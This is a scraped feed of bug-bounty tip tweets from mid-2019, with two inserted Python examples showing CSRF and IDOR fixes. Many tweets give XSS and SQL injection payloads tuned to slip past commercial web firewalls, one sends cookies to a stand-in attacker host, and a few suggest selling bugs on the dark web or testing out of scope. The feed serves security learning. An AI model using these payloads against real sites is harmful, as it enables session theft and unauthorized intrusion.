2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9

@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result 😁: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which have vulnerability bounty programs, or test every possible website we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early, some took a lot of time …. but eventually they all made it … It's just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking in the wrong place with the wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: 👾 <script /***/>~/***/confirm(´\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450´~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a brute-force list. 3- Now use that list to recursively brute-force all the API endpoints. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. 👾 <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip — Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong 😂 always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. Consider them one book. Real-World Bug Hunting: will teach you how to find bugs based on real-world reports. Bug Bounty Hunting Essentials: will teach you how to find bugs based on practical, effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here is the write-up of how I bypassed CORS to steal the victim's account information 🧐🧐 https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd

@pouyana1


2019-08-01 03:21:17
0 found a bug in Microsoft Outlook Web App: everyone who sends me an email, the mail won't deliver and he/she will automatically sign out after that 😂😂 will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF 👾 <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi 🕊️ ‏
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. 💉 but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position. #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: https://t.co/rlE7n7PnRi
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. 🕸️ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS 🧐 <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do bounty with #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. 👀 https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot 😎 "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(“XSS”)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forgets to check whether the presence of the token parameter is mandatory or not. 😅 I removed the token parameter and CSRF works like a charm. 🙊 Then look at other requests and they also act the same 🙊 #bugbounty #bugbountytip #infosec
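Added example, not from the tweet: a CSRF check that validates the token only when the client sent one, next to a version that treats a missing token as a failure. The session store, form dictionary and token format are constructed for illustration.

```python
"""CSRF token validation: missing-token-is-OK bug vs. a check that requires the token.

Constructed example: `session` is a per-user server-side dict and `form` is the
parsed POST body; neither is tied to a particular web framework.
"""
import hmac
import secrets
from typing import Dict


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Store a fresh random token in the session and return it for embedding in the form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def vulnerable_csrf_ok(session: Dict[str, str], form: Dict[str, str]) -> bool:
    """The bug described above: only validate when a token is present."""
    supplied = form.get("csrf_token")
    if supplied is None:
        return True                         # absent parameter silently accepted
    return supplied == session.get("csrf_token")


def hardened_csrf_ok(session: Dict[str, str], form: Dict[str, str]) -> bool:
    """Fix: both sides must have a token, and they are compared in constant time."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False                        # no token in session or request: reject
    return hmac.compare_digest(expected, supplied)


def simulate_cross_site_post(check) -> bool:
    """A forged request carries the victim's session but cannot know the token."""
    victim_session: Dict[str, str] = {}
    issue_csrf_token(victim_session)
    forged_form = {"email": "attacker@example.invalid"}   # constructed: no csrf_token field
    return check(victim_session, forged_form)
```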
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as PDF files have been uploaded to my GitHub repository; the number of articles will continue to get higher until it reaches 2000 articles as PDF files. The path to the new articles: https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
8 SSRF Trick: SSRF/XSPA in Microsoft’s Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometimes when you come across specific features but for those you have to pay, just go on Google Images, type the company name .. some people put images that contain endpoint URLs which are not under the demo feature .. but are contained in the full specific features
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips Don't forget console.log() if alert()/confirm()/prompt() are blocked!
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim🇧🇩
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many ways to bypass but couldn't succeed! Then entered the main program's login info and clicked login! Guess what? It took me to the Admin Panel 🤙 #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, rewards crossed the first 1000€!!😋 Thanks @YogoshaOfficial 😍 #bugbountytip = Some things will take time!! And patience matters..!! #bugbounty #We ❤️ #தமிழன் https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 I like that #bugbountytip
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed First 1000€ Euros!!😋 Thanks to all my well-wishers😍 and yogosha.official 😍 #bugbountytip = Some things will take time!! And… https://t.co/iKQCiQ4wxy
Demolalagos🌍
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If Wappalyzer is showing the latest Angular version of the site, don't think of not getting an XSS bypass. I used Angular XSS payload v1.3.2 on a website using AngularJS v1.6.4. Developers do make mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a registration page during a web pentesting operation, you should try to discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. 😄😅 #bugbounty #bugbountytip #infosec “[Critical] Bypass CSRF protection on IBM” by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If Wappalyzer is showing the latest Angular version of the site, don't think of not getting an XSS bypass. I used Angular XSS payload v1.3.2 on a website using AngularJS v1.6.4. Developers do make mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a lower number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp😅
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.😋😋 #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti I shortly ago reported a clickjacking as high because it led to sensitive data exposure. Just make the transparency of the iframe very low and let him steal his own information using Ctrl+A and Ctrl+C and place that in a separate input field. Make it a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1’}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Ever came across a bug that made you sleepless until you exploited it? I am working on one such and haven't had a good sleep for two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks 💰 RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum 🇹🇳
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip When looking for priv esc, read the API docs, jump to old versions, look for interesting calls and watch out for deprecated API endpoints; sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 You can use the fragments plugin in the WebScarab proxy to identify the comments in the HTML source code, which may contain useful/sensitive info for the pentester; an easy & fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumeration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(char(n1,n2,n3 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission💰💰 https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip In-depth Bug Bounty Guide : https://t.co/e89Kne5bWf 💰 Well-written blog post by @officialpranj. For newbies in infosec, I recommend reading this blog post twice a week. ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed you everything You have to do itself You have to be Self learner or Independent learner If you’ve lack of motivation to learn then your infosec career is end here Bcz You’re not going to get far in Infosec
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {🕷} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT 😎
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey guys, join me and many other infosec aspirants in this group named Nullcrowd - https://t.co/ahMK4OPqkP, the best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet work : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD 💰 I recommend everyone to read this because this is the building block for Infosec 🌈 ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoint accepts a list of IDs and you get unauthorized for [‘invalidId’] - try [‘validId’, ‘invalidId’]. It’s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
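The defender's side of the tip above, as an added example that is not part of the tweet: a batch endpoint must authorize every ID in the list, not the first one and not "any" of them. The ownership table, document contents and user names below are constructed; the two flawed functions reproduce the two validation mistakes the tweet describes so they can be compared with the correct all-or-nothing check.

```python
"""Added example: authorizing a batch of object IDs, every element, not just the first."""

# Constructed ownership table: object ID -> owning user.
OWNERSHIP = {
    "doc-1": "alice",
    "doc-2": "alice",
    "doc-3": "bob",
}

# Constructed object contents, what the batch endpoint would return.
DOCUMENTS = {
    "doc-1": "alice's notes",
    "doc-2": "alice's invoice",
    "doc-3": "bob's report",
}


def _owns(user, object_id):
    # Unknown IDs and other users' IDs are treated identically,
    # so the response gives no oracle for enumerating valid IDs.
    return OWNERSHIP.get(object_id) == user


def authorize_first_only(user, ids):
    """Flawed: only the first element is checked; the rest ride along."""
    return bool(ids) and _owns(user, ids[0])


def authorize_any(user, ids):
    """Flawed: one authorized element lets every other element through."""
    return any(_owns(user, i) for i in ids)


def authorize_all(user, ids):
    """Correct: the request is allowed only if every ID belongs to the caller."""
    return bool(ids) and all(_owns(user, i) for i in ids)


def fetch_documents(user, ids):
    """Batch endpoint built on the correct check: all-or-nothing, no partial leak."""
    if not authorize_all(user, ids):
        raise PermissionError("one or more requested objects are not accessible")
    return {i: DOCUMENTS[i] for i in ids}


if __name__ == "__main__":
    mixed = ["doc-3", "doc-1"]  # bob's own ID first, then alice's
    print("first-only:", authorize_first_only("bob", mixed))  # True  (bug)
    print("any:       ", authorize_any("bob", mixed))         # True  (bug)
    print("all:       ", authorize_all("bob", mixed))         # False (correct)
```

The all-or-nothing shape matters: returning the authorized subset and silently dropping the rest is tempting, but it turns the endpoint into a membership oracle for IDs the caller does not own.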
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip 😉 https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
Khan Sahab 🇮🇳
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs not consider taking a screenshot of the Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
